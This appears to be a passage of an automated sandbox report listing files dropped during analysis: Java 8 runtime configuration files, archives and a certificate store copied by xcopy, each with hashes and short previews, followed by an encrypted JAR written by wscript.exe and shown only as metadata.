                                                                                                                                                                                                                                  MD5:F8734590A1AEC97F6B22F08D1AD1B4BB
                                                                                                                                                                                                                                  SHA1:AA327A22A49967F4D74AFEEE6726F505F209692F
                                                                                                                                                                                                                                  SHA-256:7D51936FA3FD5812AE51F9F5657E0E70487DCA810B985607B6C5D6603F5E6C98
                                                                                                                                                                                                                                  SHA-512:72E62DC63DAA2591B48B2B774E2479B8861D159061B92FD3A0A06256295DA4D8B20DAFA77983FDBF6179F666F9FF6B3275F7A5BCF9555E638595230B9A42B177
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#.#.# Copyright (c) 1999, Oracle and/or its affiliates. All rights reserved..# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms..#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#..#.#.PostScript printer property file for Java 2D printing..#.# WARNING: This is an internal implementation file, not a public file..# Any customisation or reliance on the existence of this file and its.# contents or syntax is discouraged and unsupported..# It may be incompatibly changed or removed without any notice..#.#.font.num=35.#.# Legacy logical font family names and logical font aliases should all.# map to the primary logical font names..#.serif=serif.times=serif.timesroman=serif.sansserif=sansserif.helvetica=sansserif.dialog=sansserif.dialoginput=monospaced.monospaced=monospaced.courier=monospaced.#.# Next, physical fonts which can be safely mapped to standard postscript fonts.# These keys generally map to a value which is the same as the key, so.# the key/value is just a way to say the font has
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Java archive data (JAR)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3547798
                                                                                                                                                                                                                                  Entropy (8bit):6.059253420631559
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:49152:BzJYGPpxjOBAS++jqWr739qhgO587exNJrGAhiDwthCHJu9r2JcaD4oc2HmtjLbH:wKl82
                                                                                                                                                                                                                                  MD5:9D80C1B2B0177CF33D9EBC064EC11D24
                                                                                                                                                                                                                                  SHA1:1E449A2FC33CC95F72FD1916380DFB3B2C08CAD6
                                                                                                                                                                                                                                  SHA-256:AD4DF96ED8A499A3F44A60D787ED3742007A213807058C82903AD3A5C2B41972
                                                                                                                                                                                                                                  SHA-512:250E4299CECB42D3E106F28561CD743CD2CD01AE9E68D53ADF4074F5B884FA9E86DD25B8590E96349F155AF09C983B777D7C3F3AAB6FF30EFED80034070CBA1C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:PK.........p.V................META-INF/....PK.........p.V....?...?.......META-INF/MANIFEST.MFManifest-Version: 1.0..Implementation-Vendor: Oracle Corporation..Implementation-Title: Java Runtime Environment..Implementation-Version: 1.8.0_381..Specification-Vendor: Oracle Corporation..Created-By: 1.7.0_291 (Oracle Corporation)..Specification-Title: Java Platform API Specification..Specification-Version: 1.8....PK........fn.V....$...$.......META-INF/mailcap.default#.# This is a very simple 'mailcap' file.#.image/gif;;..x-java-view=com.sun.activation.viewers.ImageViewer.image/jpeg;;..x-java-view=com.sun.activation.viewers.ImageViewer.text/*;;..x-java-view=com.sun.activation.viewers.TextViewer.text/*;;..x-java-edit=com.sun.activation.viewers.TextEditor.PK........fn.V..{~2...2.......META-INF/mimetypes.default#.# A simple, old format, mime.types file.#.text/html..html htm HTML HTM.text/plain..txt text TXT TEXT.image/gif..gif GIF.image/ief..ief.image/jpeg..jpeg jpg jpe JPG.image/tiff..tiff tif
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Java archive data (JAR)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):55853982
                                                                                                                                                                                                                                  Entropy (8bit):6.048844892791932
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:393216:wvBSlf1XqxsGxz9r5t2UQ6q6px4J1FvsA:wvBSlw/pr5t2UQ6q6px4J1FH
                                                                                                                                                                                                                                  MD5:4902458FF7CFFAA64B42E3EE3B98BEAA
                                                                                                                                                                                                                                  SHA1:3D19509EEF9DD17F54986F8B12CD8F7417D0AED6
                                                                                                                                                                                                                                  SHA-256:81A3F6849D610119D4D6FE1500C9DD34566E88621E0B3D1258A92D8791540AFF
                                                                                                                                                                                                                                  SHA-512:FA1A30E9C6E14B14EC450BDE57EF2EEFE050EC82E41E742B6A83540900D8290FE8AA0D00F8D5C15AD1F3D174132ECB1EDD726311ED09EBB08B568627222F5FEC
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:PK.........p.V................META-INF/....PK.........p.V.<|.&...&.......META-INF/MANIFEST.MFManifest-Version: 1.0..Implementation-Vendor: Oracle Corporation..Implementation-Title: Java Runtime Environment..Implementation-Version: 1.8.0_381..Specification-Vendor: Oracle Corporation..Created-By: 1.7.0_291 (Oracle Corporation)..Specification-Title: Java Platform API Specification..Specification-Version: 1.8....Name: javax/swing/JCheckBoxMenuItem.class..Java-Bean: True....Name: javax/swing/JDialog.class..Java-Bean: True....Name: javax/swing/JSlider.class..Java-Bean: True....Name: javax/swing/JTextField.class..Java-Bean: True....Name: javax/swing/JTextPane.class..Java-Bean: True....Name: javax/swing/JTextArea.class..Java-Bean: True....Name: javax/swing/JList.class..Java-Bean: True....Name: javax/swing/JFormattedTextField.class..Java-Bean: True....Name: javax/swing/JApplet.class..Java-Bean: True....Name: javax/swing/JSpinner.class..Java-Bean: True....Name: javax/swing/JLabel.class..Java-Bea
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4054
                                                                                                                                                                                                                                  Entropy (8bit):5.791238368311065
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:uudVZoOZ3mFcFtqZB0q6jV//H2cB/iye6S04UioQeXbZFf6HULUBnSQXHvLnOTSW:uudVZoOZ3mFcXqZB0q6B//H2cB/Ze6SG
                                                                                                                                                                                                                                  MD5:B2C6EAE6382150192EA3912393747180
                                                                                                                                                                                                                                  SHA1:D4FFB3857EAB403955CE9D156E46D056061E6A5A
                                                                                                                                                                                                                                  SHA-256:6C73C877B36D4ABD086CB691959B180513AC5ABC0C87FE9070D2D5426D3DBF71
                                                                                                                                                                                                                                  SHA-512:898582C23F311F9F46825E7F8B6D36BED7255E5A4E2FA4B4452153B86EFBD88DB7E5B94DBD9CB9DB554F62B84D19F22AE9D81822B4896081C487FB50946A9A9A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# JNLPAppletLauncher applet-launcher.jar.SHA1-Digest-Manifest: 5Bo5/eg892hQ9mgbUW56iDmsp1k=..# 7066583.SHA1-Digest-Manifest: x17xGEFzBRXY2pLtXiIbp8J7U9M=.SHA1-Digest-Manifest: ya6YNTzMCFYUO4lwhmz9OWhhIz8=.SHA1-Digest-Manifest: YwuPyF/KMcxcQhgxilzNybFM2+8=..# 7066809.SHA1-Digest-Manifest: dBKbNW1PZSjJ0lGcCeewcCrYx5g=.SHA1-Digest-Manifest: lTYCkD1wm5uDcp2G2PNPcADG/ds=.SHA1-Digest-Manifest: GKwQJtblDEuSVf3LdC1ojpUJRGg=..# 7186931.SHA1-Digest-Manifest: 0CUppG7J6IL8xHqPCnA377Koahw=.SHA1-Digest-Manifest: 3aJU1qSK6IYmt5MSh2IIIj5G1XE=.SHA1-Digest-Manifest: 8F4F0TXA4ureZbfEXWIFm76QGg4=.SHA1-Digest-Manifest: B1NaDg834Bgg+VE9Ca+tDZOd2BI=.SHA1-Digest-Manifest: bOoQga+XxC3j0HiP552+fYCdswo=.SHA1-Digest-Manifest: C4mtepHAyIKiAjjqOm6xYMo8TkM=.SHA1-Digest-Manifest: cDXEH+bR01R8QVxL+KFKYqFgsR0=.SHA1-Digest-Manifest: cO2ccW2cckTvpR0HVgQa362PyHI=.SHA1-Digest-Manifest: D/TyRle6Sl+CDuBFmdOPy03ERaw=.SHA1-Digest-Manifest: eJfWm86yHp2Oz5U8WrMKbpv6GGA=.SHA1-Digest-Manifest: g3mA5HqcRBlKaUVQsapnKhOSEas=.SHA1-Dig
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2527
                                                                                                                                                                                                                                  Entropy (8bit):4.141598882390435
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:NjYQMQgcJrrDJOz74ZeKnZqUyYuj4G0o5xz4lCENa+qJe:NjYQbTwzkZeKnZqUfGxzWCEPqU
                                                                                                                                                                                                                                  MD5:8273F70416F494F7FA5B6C70A101E00E
                                                                                                                                                                                                                                  SHA1:AEAEBB14FBF146FBB0AAF347446C08766C86CA7F
                                                                                                                                                                                                                                  SHA-256:583500B76965EB54B03493372989AB4D3426F85462D1DB232C5AE6706A4D6C58
                                                                                                                                                                                                                                  SHA-512:E697A57D64ACE1F302300F83E875C2726407F8DAF7C1D38B07AB8B4B11299FD698582D825BEE817A1AF85A285F27877A9E603E48E01C72E482A04DC7AB12C8DA
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:Algorithm
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Java KeyStore
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):112247
                                                                                                                                                                                                                                  Entropy (8bit):7.6321690047084525
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:lK1kNaUXlk471L8Q0WEXOQHoftVcKIt8nUNTalyCpqszxa:II84xF0WDyoteKIWU8lyCpba
                                                                                                                                                                                                                                  MD5:25091C226F74B16353AECB8C982CB075
                                                                                                                                                                                                                                  SHA1:90712B8F8DD4D651973FA0CF91A4BA7FF9BBEB64
                                                                                                                                                                                                                                  SHA-256:878AE02BF6F6723B034EF7B826E7D17A31F266CAB1BFE088080D8AD2AD167C75
                                                                                                                                                                                                                                  SHA-512:4FECD5A4E3F246BECEF9EB8DE6D357E85D71E6B8506C4E96E3083ADAE6AA24B2DE3ED87321BD2F1CAD15C8411C4D2EB254ACEA119CE78B9AB561CC9BC783F23D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:...........b......sslrooteccca [jdk]...s.. ...X.509....0...0..........u....h[.0...*.H.=...0|1.0...U....US1.0...U....Texas1.0...U....Houston1.0...U....SSL Corporation110/..U...(SSL.com Root Certification Authority ECC0...160212181403Z..410212181403Z0|1.0...U....US1.0...U....Texas1.0...U....Houston1.0...U....SSL Corporation110/..U...(SSL.com Root Certification Authority ECC0v0...*.H.=....+...".b..En.P.#6._(..."d?.z......q$..I...G.X.-....5.'.SX.b...[.k1RcA;......4......E.....#.....G.c0a0...U........s0.5........!..0...U.......0....0...U.#..0.....s0.5........!..0...U...........0...*.H.=....g.0d.0o..Y..`.a..{.../......Pk.FF..!.b...........]r>..0.....0$.|m.U..>..3.f........,.]~....hm.|in_..je......digicertassuredidg3 [jdk]...V.H.8..X.509...J0..F0...........Z....ID..$.l.0...*.H.=...0e1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1$0"..U....DigiCert Assured ID Root G30...130801120000Z..380115120000Z0e1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicer
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2564
                                                                                                                                                                                                                                  Entropy (8bit):4.435878574816843
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:hjrUah3ontU2H+h/ic1mo8vwwQcNpIjLSkLuodAZdgh1y0ykt0wS5:R4fc17wVNwltpU
                                                                                                                                                                                                                                  MD5:BFDD90599E2E55FFD9378DFEB8AC1760
                                                                                                                                                                                                                                  SHA1:9D7C4615FF9E3902F1A19771E89E6B6423C2098D
                                                                                                                                                                                                                                  SHA-256:6191396D66399276D466B8CC9C932EA3F7F3FACCB6876A60234A05EA0580701F
                                                                                                                                                                                                                                  SHA-512:AA71631AA5DBB445EA66D946DDED9707DF5BB6DBF03F272A643C2AC3CB8AEAD3CF1F9C37D4CC43561FBE19C506EE4C1543F6B38EC432A959619C31AE049AB6A8
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:.// Standard extensions get all permissions by default..grant codeBase "file:${{java.ext.dirs}}/*" {. permission java.security.AllPermission;.};..// default permissions granted to all domains..grant {. // Allows any thread to stop itself using the java.lang.Thread.stop(). // method that takes no argument.. // Note that this permission is granted by default only to remain. // backwards compatible.. // It is strongly recommended that you either remove this permission. // from this policy file or further restrict it to code sources. // that you specify, because Thread.stop() is potentially unsafe.. // See the API specification of java.lang.Thread.stop() for more. // information.. permission java.lang.RuntimePermission "stopThread";.. // allows anyone to listen on dynamic ports. permission java.net.SocketPermission "localhost:0", "listen";.. // "standard" properies that can be read by anyone..
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):57227
                                                                                                                                                                                                                                  Entropy (8bit):4.869557420477606
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:rn4LHAEcqrlANbX7qL1AdL3naP2rOpOQSvbOETyqp+Z+Ijt+M38ykbLIsS8e677c:rs2aVOQCbOETyqpmLjt1CLze0YKQN3F
                                                                                                                                                                                                                                  MD5:8F0E3440FFFDBCAA9D26BE4730492A66
                                                                                                                                                                                                                                  SHA1:20A3E5A8ECBEC20D41D7124120D264F61DE96613
                                                                                                                                                                                                                                  SHA-256:B5E8205764B83F46B50187B2021DE7C86A890DF908A8D6C17275A68924F832C6
                                                                                                                                                                                                                                  SHA-512:C04528769CE780E730EF71803CA8191C217F571F62703DACA273499B90E93101383A3699263458C205CD7A8733399C3C2CA6AFC85B6843C2C5E2BA0890E762CB
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#..# This is the "master security properties file"...#..# An alternate java.security properties file may be specified..# from the command line via the system property..#..# -Djava.security.properties=<URL>..#..# This properties file appends to the master security properties file...# If both properties files specify values for the same key, the value..# from the command-line properties file is selected, as it is the last..# one loaded...#..# Also, if you specify..#..# -Djava.security.properties==<URL> (2 equals),..#..# then that properties file completely overrides the master security..# properties file...#..# To disable the ability to specify an additional properties file from..# the command line, set the key security.overridePropertiesFile..# to false in the master security properties file. It is set to true..# by default...#..# If this properties file fails to load, the JDK implementation will throw..# an unspecified error when initializing the java.security.Security class.....
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):98
                                                                                                                                                                                                                                  Entropy (8bit):4.75309355004813
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:FGIWgjM0ePFUN1/6IGNDAPVn7n:8c2PFUqIrR7
                                                                                                                                                                                                                                  MD5:9107D028BD329DBFE4C1F19015ED6D80
                                                                                                                                                                                                                                  SHA1:4384CA5E4D32F7DD86D8BADDD1E690730D74E694
                                                                                                                                                                                                                                  SHA-256:B7A87D1F3F4B7BA1D19D0460FA4B63BD1093AFC514D67FE3C356247236326425
                                                                                                                                                                                                                                  SHA-512:81B14373B64CE14AF26B70D12D831E05158D5A4FA8CEC0508FEF8A6CA65B6F4EF73928F4B1E617C68DDEACFF9328A3D4433B041B7FB14DE248B1428C51DBC716
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:.grant codeBase "file:${jnlpx.home}/javaws.jar" {. permission java.security.AllPermission;.};..
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3482
                                                                                                                                                                                                                                  Entropy (8bit):7.607020082691535
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:nON9byV15nrrNtL5rbszDMO6MS+zrHPjfi2UXHII:Q9b+d9x5EzDM8N32PX1
                                                                                                                                                                                                                                  MD5:0D59C5639AA24C7D326E7BD54BB8EDA5
                                                                                                                                                                                                                                  SHA1:58875D7463460D7998C4013912FB89965E823044
                                                                                                                                                                                                                                  SHA-256:9CE50A70ED7051C155AB8EA06755F94823D8D1CBA67FFD8FD3FE3249B3AC31EA
                                                                                                                                                                                                                                  SHA-512:2175B0CB6FF8B3AFE37FB24EBEEF406D7920BE404EE66597A47699607A9B39F981C023F7E4133359FEF9910FE7885BA846D3C532B22891A8231E23EAF440896D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3984
                                                                                                                                                                                                                                  Entropy (8bit):7.610750460615757
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:WBzPKA45zM5nrrNtL5rbszDMp4HeFteOjfiG2:azPKH5zMd9x5EzDMp4HQteDG2
                                                                                                                                                                                                                                  MD5:6280D06E46E0CC047E04C85C83874566
                                                                                                                                                                                                                                  SHA1:7D0A29932B496EDBDD1FC55572014BC89703AD07
                                                                                                                                                                                                                                  SHA-256:92780525250258F336A8F746ED7437035512D06050D85786FB44FDF12E08419C
                                                                                                                                                                                                                                  SHA-512:E3EF446B02943915F874DC09433833E5FF131ABAD93D04F95AA6E887881CBF71B15AD0F41E8C7D57864A003559BBC3769452B17600664207308AE99340BFB46E
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3482
                                                                                                                                                                                                                                  Entropy (8bit):7.607316004726179
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:BOb9byVP5nrrNtL5rbszDMO6MS+zrHPjfiwIXHII:o9b8d9x5EzDM8N32NX1
                                                                                                                                                                                                                                  MD5:6CBCA5808B4A8613D2FED6FE4A84C449
                                                                                                                                                                                                                                  SHA1:0135B30EBEC03FB69D79CDC3126E608D9EFFB8B2
                                                                                                                                                                                                                                  SHA-256:761AAB2969883E9E5EA76DF63CA404FB67673EFC3F97DEF057F8E22517FC9518
                                                                                                                                                                                                                                  SHA-512:4D9BF052AA124D07673C601CBFB83223B87369F7BE7575A13E13C0D893E57849BA11E430B7769901782C26471528DFAA130996916451E1A7E38CF28468E44CFA
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3490
                                                                                                                                                                                                                                  Entropy (8bit):7.6129558656260246
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:qQXebz5nrrNtL5rbszDMXNQIh3WEXjfi3f:BXefd9x5EzDMnWE+3f
                                                                                                                                                                                                                                  MD5:360663F26C5584E6C6127254B261FA0C
                                                                                                                                                                                                                                  SHA1:AEE6515EEDE2AD7C697BA8A61BDD9359BE3319D2
                                                                                                                                                                                                                                  SHA-256:02F69A433405EA928C89A8AADE74E5462282CCB9A9D30851312ED3459398F85C
                                                                                                                                                                                                                                  SHA-512:E3920D5ABBBE6B0E3029ED1E0B2CE1A53DA6C7E728F635B12F00B1FD2EB6151FFF74B9DC85EC0C0920F7FDA440C1604D24CA766CDBCB78BE3425088D97E00208
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):232158
                                                                                                                                                                                                                                  Entropy (8bit):5.128878765472157
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:5vHezQvyRwG1Ndqf4szTx+3YUmdzGWMmcLzRIXwhvjxlO8nQB7zxNlqW1Gy2Q/Ef:5veni4wvqhQciKPS+
                                                                                                                                                                                                                                  MD5:1EF19D3FC87C286EEC9C51B480E3AA1C
                                                                                                                                                                                                                                  SHA1:FC105D78083044261065296645D95A8FEF1E5F96
                                                                                                                                                                                                                                  SHA-256:0E547437025419F85C5843702119A7CE6D5CAD7BF039B8AB5499514D4599D0E4
                                                                                                                                                                                                                                  SHA-512:5E37DE082ABEBF26B29BA8C2FC69A319EA19C7010DA7AFBD5D73E81555B5A38F8A2C2F015A64AD768289DC1097D47FE944CFB66D0EE95879B420000FC20D3912
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1210
                                                                                                                                                                                                                                  Entropy (8bit):4.681309933800066
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:va19LezUlOGdZ14BilDEwG5u3nVDWc/Wy:iaLGr1OsS5KnVaIWy
                                                                                                                                                                                                                                  MD5:4F95242740BFB7B133B879597947A41E
                                                                                                                                                                                                                                  SHA1:9AFCEB218059D981D0FA9F07AAD3C5097CF41B0C
                                                                                                                                                                                                                                  SHA-256:299C2360B6155EB28990EC49CD21753F97E43442FE8FAB03E04F3E213DF43A66
                                                                                                                                                                                                                                  SHA-512:99FDD75B8CE71622F85F957AE52B85E6646763F7864B670E993DF0C2C77363EF9CFCE2727BADEE03503CDA41ABE6EB8A278142766BF66F00B4EB39D0D4FC4A87
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:############################################################.# Sound Configuration File.############################################################.#.# This properties file is used to specify default service.# providers for javax.sound.midi.MidiSystem and.# javax.sound.sampled.AudioSystem..#.# The following keys are recognized by MidiSystem methods:.#.# javax.sound.midi.Receiver.# javax.sound.midi.Sequencer.# javax.sound.midi.Synthesizer.# javax.sound.midi.Transmitter.#.# The following keys are recognized by AudioSystem methods:.#.# javax.sound.sampled.Clip.# javax.sound.sampled.Port.# javax.sound.sampled.SourceDataLine.# javax.sound.sampled.TargetDataLine.#.# The values specify the full class name of the service.# provider, or the device name..#.# See the class descriptions for details..#.# Example 1:.# Use MyDeviceProvider as default for SourceDataLines:.# javax.sound.sampled.SourceDataLine=com.xyz.MyDeviceProvider.#.# Example 2:.# Specify the default Synthesizer by it
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):103785
                                                                                                                                                                                                                                  Entropy (8bit):7.157129447913368
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:d0EQmcI53atcLHXMBa9LadfFE3o6/////VMhPaDGdarIa6UWgnKhgEjK:dTtzDXMEJaenZDG4rx6UWxhgEjK
                                                                                                                                                                                                                                  MD5:53657D061C8233BDE2DC4D98918D7F89
                                                                                                                                                                                                                                  SHA1:FE5E2734AA810C3212A5078996DEB357137B61F0
                                                                                                                                                                                                                                  SHA-256:612BADE1C96FD5658FC1D881405381B99124D4F548A1604AC7A869235E6F819D
                                                                                                                                                                                                                                  SHA-512:0FE2756FE720E207CC4CC3D9C82BE8DA96568111E79F68FEF47E58A874AF4A3C4B7B50745B5763A52F11E6BFC57E1043098C2156356E36B18345DBE70FA7B75A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:...TZDB....2023c.[..Africa/Abidjan..Africa/Accra..Africa/Addis_Ababa..Africa/Algiers..Africa/Asmara..Africa/Asmera..Africa/Bamako..Africa/Bangui..Africa/Banjul..Africa/Bissau..Africa/Blantyre..Africa/Brazzaville..Africa/Bujumbura..Africa/Cairo..Africa/Casablanca..Africa/Ceuta..Africa/Conakry..Africa/Dakar..Africa/Dar_es_Salaam..Africa/Djibouti..Africa/Douala..Africa/El_Aaiun..Africa/Freetown..Africa/Gaborone..Africa/Harare..Africa/Johannesburg..Africa/Juba..Africa/Kampala..Africa/Khartoum..Africa/Kigali..Africa/Kinshasa..Africa/Lagos..Africa/Libreville..Africa/Lome..Africa/Luanda..Africa/Lubumbashi..Africa/Lusaka..Africa/Malabo..Africa/Maputo..Africa/Maseru..Africa/Mbabane..Africa/Mogadishu..Africa/Monrovia..Africa/Nairobi..Africa/Ndjamena..Africa/Niamey..Africa/Nouakchott..Africa/Ouagadougou..Africa/Porto-Novo..Africa/Sao_Tome..Africa/Timbuktu..Africa/Tripoli..Africa/Tunis..Africa/Windhoek..America/Adak..America/Anchorage..America/Anguilla..America/Antigua..America/Araguaina..America/
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):9577
                                                                                                                                                                                                                                  Entropy (8bit):5.17061677089257
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:qwfOC9OYOxUmHomjgDwlZ+TFXsq2H+aUHCHQj4SV0l2:qqgniTyq06a2
                                                                                                                                                                                                                                  MD5:62BC9FA21191D34F1DB3ED7AD5106EFA
                                                                                                                                                                                                                                  SHA1:750CC36B35487D6054E039469039AECE3A0CC9E9
                                                                                                                                                                                                                                  SHA-256:83755EFBCB24476F61B7B57BCF54707161678431347E5DE2D7B894D022A0089A
                                                                                                                                                                                                                                  SHA-512:AF0DDB1BC2E9838B8F37DC196D26024126AC989F5B632CB2A8EFDC29FBCE289B4D0BAC587FE23F17DFB6905CEADA8D07B18508DB78F226B15B15900738F581A3
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#.# This file describes mapping information between Windows and Java.# time zones..# Format: Each line should include a colon separated fields of Windows.# time zone registry key, time zone mapID, locale (which is most.# likely used in the time zone), and Java time zone ID. Blank lines.# and lines that start with '#' are ignored. Data lines must be sorted.# by mapID (ASCII order)..#.# NOTE.# This table format is not a public interface of any Java.# platforms. No applications should depend on this file in any form..#.# This table has been generated by a program and should not be edited.# manually..#.Romance:-1,64::Europe/Paris:.Romance Standard Time:-1,64::Europe/Paris:.Warsaw:-1,65::Europe/Warsaw:.Central Europe:-1,66::Europe/Prague:.Central Europe Standard Time:-1,66::Europe/Prague:.Prague Bratislava:-1,66::Europe/Prague:.W. Central Africa Standard Time:-1,66:AO:Africa/Luanda:.FLE:-1,67:FI:Europe/Helsinki:.FLE Standard Time:-1,67:FI:Europe/Helsinki:.GFT:-1,6
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):165
                                                                                                                                                                                                                                  Entropy (8bit):5.2690414774929515
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:tqrYHUkP9q9N3erYHUkr0IKDKqvrYHQgPqmjxhuDmgwfW0Xh6/V9Wvn:GqDg9N30qHHkKqzqLSmzx1XhaV9Wv
                                                                                                                                                                                                                                  MD5:5C744F7CA070554D8EF8DA25A8ECC498
                                                                                                                                                                                                                                  SHA1:DEA9B7499DA7A0CBC32859228A931BC692264121
                                                                                                                                                                                                                                  SHA-256:ECB941D946F99FF9910DEB9C5E54B9D577C69FB4D2D0B7094D476671DA965B2E
                                                                                                                                                                                                                                  SHA-512:FC53839EA0CCD78F250F00F55FCE82CC29A5C5DDA13E8A6DF298633567AF6A66D56534110DEA51F1D43A3620383E32E0EF3A1CFD70827667C4E67EDCDE7CD949
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:JAVA_VERSION="1.8.0_381".JAVA_RUNTIME_VERSION="1.8.0_381-b09".OS_NAME="Windows".OS_VERSION="5.1".OS_ARCH="i586".SOURCE=".:git:543f7df00d44+".BUILD_TYPE="commercial".
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                                                                                  File Type:Java archive data (JAR)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):490747
                                                                                                                                                                                                                                  Entropy (8bit):7.993198601307523
                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                  SSDEEP:12288:x8h4GbbFN8rQO/rATlnt85pxogQNUhIK/0c2qnAU:x83T88O/NsS7B2qnl
                                                                                                                                                                                                                                  MD5:D7D1131452A0427E78A2710D280537B5
